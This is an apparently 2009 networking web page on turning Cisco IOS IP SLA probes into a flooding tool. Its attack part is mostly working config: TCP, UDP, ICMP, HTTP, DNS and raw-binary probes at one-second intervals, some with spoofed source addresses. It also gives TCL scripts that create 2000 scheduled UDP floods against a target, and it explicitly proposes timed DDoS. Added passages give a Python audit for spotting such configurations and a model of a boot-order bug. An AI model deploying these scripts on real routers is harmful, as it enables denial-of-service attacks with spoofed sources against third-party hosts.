Cisco IP SLA attack
IP SLA
The IP SLA function in IOS offers another way to create packets to a specific port and target. It is normally used for testing the availability of services and/or devices, but I think there is a chance for abuse.
See some of my ideas:
- What if we create 1000 SLAs on the same router?
- Create a TCL script for creating the 1000 SLAs
- Create scheduled SLAs for a DDoS at a defined time
- Create random DNS or HTTP queries

Cisco SLA Packet Samples
SLA Sample TCP Port
TCP connections to 192.168.1.1 port 99 every 1 second
	ip sla 1
	 tcp-connect 192.168.1.1 99 control disable
	 threshold 1 
	 timeout 1
	 frequency 1
	ip sla schedule 1 life 300 start-time now
SLA Sample UDP Port
UDP connections to 192.168.1.1 port 100 from source IP 1.2.3.4 and source port 12345 every 1 second
	ip sla 2
	 udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable
	 threshold 1	
	 timeout 1
	 frequency 1
	ip sla schedule 2 life 300 start-time now
SLA Sample ICMP
ICMP echo requests to 192.168.1.1 every 1 second
	ip sla 3
	 icmp-echo 192.168.1.1
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 3 life 300 start-time now
SLA Sample FTP
FTP GET to check whether a file is on an FTP server
	ip sla 11
	 ftp get ftp://user:password@host/file_name
	!
	ip sla schedule 11 start-time now

SLA Sample HTTP
HTTP GET of index.html from 192.168.2.100 every 60 seconds
(Limit: minimum frequency for HTTP should be 60 sec)
	ip sla 4
	 http get http://192.168.2.100/index.html
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 4 life 300 start-time now
SLA Sample HTTP (RAW)
Raw HTTP request to 192.168.1.1 every 60 seconds
(Limit: minimum frequency for HTTP should be 60 sec)
	ip sla 5
	 http raw http://192.168.1.1
	 http-raw-request
	  GET /ch/index.html HTTP/1.0\r\n\r\n
	  exit
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 5 life 300 start-time now
SLA Sample DNS
DNS request for www.laber.com every 9 seconds to DNS server 192.168.1.1
(Limit: minimum frequency for DNS operation should be 9)
	ip sla 6
	 dns www.laber.com name-server 192.168.1.1
	 threshold 1
	 timeout 1
	 frequency 9
	ip sla schedule 6 life 300 start-time now
Schedule the SLA
	
	ip sla schedule 1 start-time 10:00:00 life 300 recurring           <- every day at 10:00 for 300 seconds
	ip sla schedule 2 start-time now life forever                      <- start now and run forever
	ip sla schedule 3 start-time 10:00:00 1 Jan life 1000              <- start on 1.Jan for 1000 seconds
Play around with the options: source-ip and source-port, lifetime, threshold, etc.
For testing with source-ip and source-port, the source-ip must NOT exist on a loopback interface. For flooding, "control disable" is required. For HTTP or DNS requests you cannot enable or disable "control", because there is no Cisco responder.

TCL script with SLA packets
Script Sample UDP
This TCL script creates 2000 "ip sla" entries in the config file. Each one creates a UDP packet every second to the target host 192.168.1.1, destination port 100, for 5 minutes (300 seconds).
Warning: This uses a lot of CPU power and, depending on your hardware, 2000 is too much.
 
	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}
And for removing all entries:
	puts "Deleting"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "no ip sla $X "
	}
New sample with source port and source IP
 
	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}
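Seen from the defending side, operations like the ones above (mass-created, one-second frequency, "control disable", a source-ip that is not the router's own, unlimited life) stand out in a running-config. The following audit is an added example, not part of the original page; the limits `max_ops` and `min_freq`, the `local_ips` input and the sample config are assumptions chosen for illustration.

```python
import re

# Constructed sample running-config, modelled on the samples on this page.
SAMPLE = """\
ip sla 1
 tcp-connect 192.168.1.1 99 control disable
 frequency 1
ip sla schedule 1 life 300 start-time now
ip sla 2
 udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable
 frequency 1
ip sla schedule 2 life forever start-time now
ip sla 3
 icmp-echo 192.168.1.1
 frequency 60
ip sla schedule 3 life 300 start-time now
"""

def audit_ip_sla(config, local_ips, max_ops=50, min_freq=10):
    """Return sorted (sla_id, finding) pairs; sla_id 0 is a config-wide finding."""
    ops, cur = {}, None
    for line in config.splitlines():
        if m := re.match(r"ip sla schedule (\d+) (.*)", line):
            ops.setdefault(int(m[1]), []).append("schedule " + m[2])
            cur = None
        elif m := re.match(r"ip sla (\d+)\s*$", line):
            cur = ops.setdefault(int(m[1]), [])
        elif cur is not None and line.startswith((" ", "\t")):
            cur.append(line.strip())      # sub-command of the current operation
        else:
            cur = None
    findings = []
    for sla_id, lines in ops.items():
        text = "\n".join(lines)
        if "control disable" in text:     # no responder handshake before probing
            findings.append((sla_id, "control disable"))
        if (m := re.search(r"source-ip (\S+)", text)) and m[1] not in local_ips:
            findings.append((sla_id, "source-ip not local: " + m[1]))
        if (m := re.search(r"^frequency (\d+)", text, re.M)) and int(m[1]) < min_freq:
            findings.append((sla_id, "frequency %ss" % m[1]))
        if re.search(r"^schedule .*life forever", text, re.M):
            findings.append((sla_id, "life forever"))
    if len(ops) > max_ops:                # assumed limit for a normal monitoring setup
        findings.append((0, "%d operations configured" % len(ops)))
    return sorted(findings)
```

Each finding is an indicator to review, not proof of abuse: "control disable" is also needed for legitimate probes against non-Cisco targets.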

Send binary data
With the http raw option it is possible to send text and binary data to a selectable port (source IP and port are changeable too).
You can send 0x01 with the string \x01 in the http-raw-request.
 
Sample :
 ip sla 1
  http raw http://laber.peanuts.ch:445
  http-raw-request
  \x01\x02\x03\x48\x41\x4C\x4C\x4F\xff    
  exit
 !
 ip sla schedule 1 start-time now
 
Known Problem
Currently, I found NO way to send a "NULL" (0x00), arghh...
 
Known Limits
- max 1280 chars in the config file
- max 252 chars per line
- \x23 for sending #
- \x?? reduces the max packet length
 

Strange things...
Some strange things, maybe features or bugs?
1. It's possible to set the TOS to 255, but in the DSCP field in the packets, I see only that the 6 DSCP bits are set.
	evil-router(config-ip-sla-tcp)#tos ?
	  <0-255>  Type of Service Value
2. Some problem with the order in the config file and the dependency of timeout and threshold
If you configure timeout 1 and threshold 1, you must configure threshold before timeout, but afterwards you see the following in the configuration file: timeout is before threshold.
	ip sla 4
	 tcp-connect 192.168.2.100 98 control disable
	 tos 1
	 timeout 1
	 threshold 1
	 frequency 1
	ip sla schedule 4 life 60 start-time now
and after a restart you see the following boot messages:
	
	1 DSL controller
	9 FastEthernet interfaces
	1 ISDN Basic Rate interface
	62720K bytes of ATA CompactFlash (Read/Write)
	Installed image archive
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout
	
	
		
	Press RETURN to get started!
	
I see this on my Cisco 1800 router:
	evil-router#sh version
	Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version 12.4(22)T, RELEASE SOFTWARE (fc1)
	Technical Support: http://www.cisco.com/techsupport
Update (05.01.2009):
Tests with other routers and different IOS versions show me that this must be a BUG in this version on my Cisco 1800 router.
 
Cisco Documentation
 
threshold milliseconds
(Optional) Sets the upper threshold value for calculating network monitoring statistics created by an IP SLAs operation.
Example:
Router(config-sla-monitor-echo)# threshold 10000
 
timeout milliseconds
(Optional) Sets the amount of time an IP SLAs operation waits for a response from its request packet.
Example:
Router(config-sla-monitor-echo)# timeout 10000
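
Why the saved line order produces the two boot messages can be shown by replaying the sub-commands one at a time. This is an added example, not from the original page and not Cisco's code: it models only the two checks named in the messages, takes the threshold default of 5000 from the boot message, and assumes a timeout default of 5000 ms and a frequency default of 60 s.

```python
# Assumed model of the two checks named in the boot messages; not Cisco's code.
# threshold and timeout are in milliseconds, frequency is in seconds.
DEFAULTS = {"threshold": 5000, "timeout": 5000, "frequency": 60}  # timeout default assumed

# Order in which the page says the commands must be typed.
TYPED_ORDER = ["tcp-connect 192.168.2.100 98 control disable", "tos 1",
               "threshold 1", "timeout 1", "frequency 1"]
# Order in which the router wrote them to the configuration file.
SAVED_ORDER = ["tcp-connect 192.168.2.100 98 control disable", "tos 1",
               "timeout 1", "threshold 1", "frequency 1"]

def replay(lines):
    """Apply sub-commands one at a time, as a config parser would at boot.

    Returns (final_settings, rejected), where rejected holds the error text
    of every line that failed a check against the settings at that moment.
    """
    settings, rejected = dict(DEFAULTS), []
    for line in lines:
        key, _, rest = line.partition(" ")
        if key not in DEFAULTS:
            continue  # probe type, tos, ... are outside this model
        value = int(rest)
        if key == "timeout" and value < settings["threshold"]:
            rejected.append("timeout value is less than threshold %d"
                            % settings["threshold"])
        elif key == "frequency" and value * 1000 < settings["timeout"]:
            rejected.append("Cannot set Frequency to be less than Timeout")
        else:
            settings[key] = value
    return settings, rejected
```

In this model the typed order is accepted in full, while the saved order loses both the timeout and the frequency line and the operation comes up with defaults for those two values.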
 

cisco sla links
Cisco IP SLA Infos

(c) 2009 by packetlevel.ch / last update: 26.4.2009